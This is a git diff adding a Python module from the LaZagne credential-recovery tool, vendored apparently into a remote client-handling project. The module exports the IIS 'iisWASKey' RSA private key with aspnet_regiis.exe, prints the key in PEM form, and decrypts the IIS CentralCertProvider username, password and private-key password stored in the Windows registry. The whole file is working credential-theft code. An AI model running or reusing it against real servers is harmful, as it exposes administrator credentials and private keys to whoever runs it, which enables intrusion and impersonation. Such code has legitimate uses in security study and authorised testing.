1 files changed, 138 insertions, 0 deletions

diff --git a/foreign/client_handling/lazagne/softwares/sysadmin/iiscentralcertp.py b/foreign/client_handling/lazagne/softwares/sysadmin/iiscentralcertp.py
new file mode 100644
index 0000000..a66ff7f
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/sysadmin/iiscentralcertp.py
@@ -0,0 +1,138 @@
+# -*- coding: utf-8 -*-
+import base64
+import fnmatch
+import os
+import rsa
+import string
+
+from random import *
+from xml.dom import minidom
+
+try:
+    import _winreg as winreg
+except ImportError:
+    import winreg
+
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+
+
+class IISCentralCertP(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, name='iiscentralcertp', category='sysadmin', registry_used=True, winapi_used=True)
+
+    def find_files(self, path, file):
+        """
+        Try to find all files with the same name
+        """
+        founded_files = []
+        for dirpath, dirnames, files in os.walk(path):
+            for file_name in files:
+                if fnmatch.fnmatch(file_name, file):
+                    founded_files.append(dirpath + '\\' + file_name)
+
+        return founded_files
+
+    def create_RSAKeyValueFile(self, exe_file, container):
+        tmp_file = "".join(choice(string.ascii_letters + string.digits) for x in range(randint(8, 10))) + ".xml"
+        try:
+            os.system(exe_file + " -px " + container + " " + tmp_file + " -pri > nul")
+        except OSError:
+            self.debug(u'Error executing {container}'.format(container=container))
+            tmp_file = ''
+
+        return tmp_file
+
+    def get_registry_key(self, reg_key, parameter):
+        data = ''
+        try:
+            if reg_key.startswith('HKEY_LOCAL_MACHINE'):
+                hkey = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_key.replace('HKEY_LOCAL_MACHINE\\', ''))
+            data = winreg.QueryValueEx(hkey, parameter)[0]
+        
+        except Exception as e:
+            self.debug(e)
+
+        return data
+
+    def decrypt_hash_b64(self, hash_b64, privkey):
+        hash = bytearray(base64.b64decode(hash_b64))
+        hash.reverse()
+        hash_b64 = base64.b64encode(hash)
+        hash = base64.b64decode(hash_b64)
+        message = rsa.decrypt(hash, privkey)
+        return message.decode('UTF-16')
+
+    def GetLong(self, nodelist):
+        rc = []
+        for node in nodelist:
+            if node.nodeType == node.TEXT_NODE:
+                rc.append(node.data)
+
+        st = ''.join(rc)
+        raw = base64.b64decode(st)
+        return int(raw.encode('hex'), 16)
+
+    def read_RSAKeyValue(self, rsa_key_xml):
+        xmlStructure = minidom.parseString(rsa_key_xml)
+
+        MODULUS = self.GetLong(xmlStructure.getElementsByTagName('Modulus')[0].childNodes)
+        EXPONENT = self.GetLong(xmlStructure.getElementsByTagName('Exponent')[0].childNodes)
+        D = self.GetLong(xmlStructure.getElementsByTagName('D')[0].childNodes)
+        P = self.GetLong(xmlStructure.getElementsByTagName('P')[0].childNodes)
+        Q = self.GetLong(xmlStructure.getElementsByTagName('Q')[0].childNodes)
+        InverseQ = self.GetLong(xmlStructure.getElementsByTagName('InverseQ')[0].childNodes)
+
+        privkey = rsa.PrivateKey(MODULUS, EXPONENT, D, P, Q)
+        self.debug(u'RSA Key Value - PEM:\n {RSAkey}'.format(RSAkey=privkey.save_pkcs1(format='PEM')))
+
+        return privkey
+
+    def run(self):
+        pfound = []
+
+        ccp_enabled = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
+                                            'Enabled')
+        if ccp_enabled != 1:
+            self.debug(u'IIS CentralCertProvider is not enabled')
+            return
+
+        exe_files = self.find_files(os.environ['WINDIR'] + '\\Microsoft.NET\\Framework64\\', 'aspnet_regiis.exe')
+        if len(exe_files) == 0:
+            exe_files = self.find_files(os.environ['WINDIR'] + '\\Microsoft.NET\\Framework\\', 'aspnet_regiis.exe')
+            if len(exe_files) == 0:
+                self.debug(u'File not found aspnet_regiis.exe')
+                return
+
+        self.info(u'aspnet_regiis.exe files found: {files}'.format(files=exe_files))
+        rsa_xml_file = self.create_RSAKeyValueFile(exe_files[-1], "iisWASKey")
+        if rsa_xml_file == '':
+            self.debug(u'Problems extracting RSA Key Value')
+            return
+
+        with open(rsa_xml_file, 'rb') as File:
+            rsa_key_xml = File.read()
+
+        os.remove(rsa_xml_file)
+        self.debug(u'Temporary file removed: {filename}'.format(filename=rsa_xml_file))
+        privkey = self.read_RSAKeyValue(rsa_key_xml)
+        values = {}
+        
+        CertStoreLocation = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
+                                                  'CertStoreLocation')
+        values['CertStoreLocation'] = CertStoreLocation
+        
+        username = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
+                                         'Username')
+        values['Username'] = username
+        
+        pass64 = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
+                                       'Password')
+        values['Password'] = self.decrypt_hash_b64(pass64, privkey)
+
+        privpass64 = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
+                                           'PrivateKeyPassword')
+        values['Private Key Password'] = self.decrypt_hash_b64(privpass64, privkey)
+
+        pfound.append(values)
+        return pfound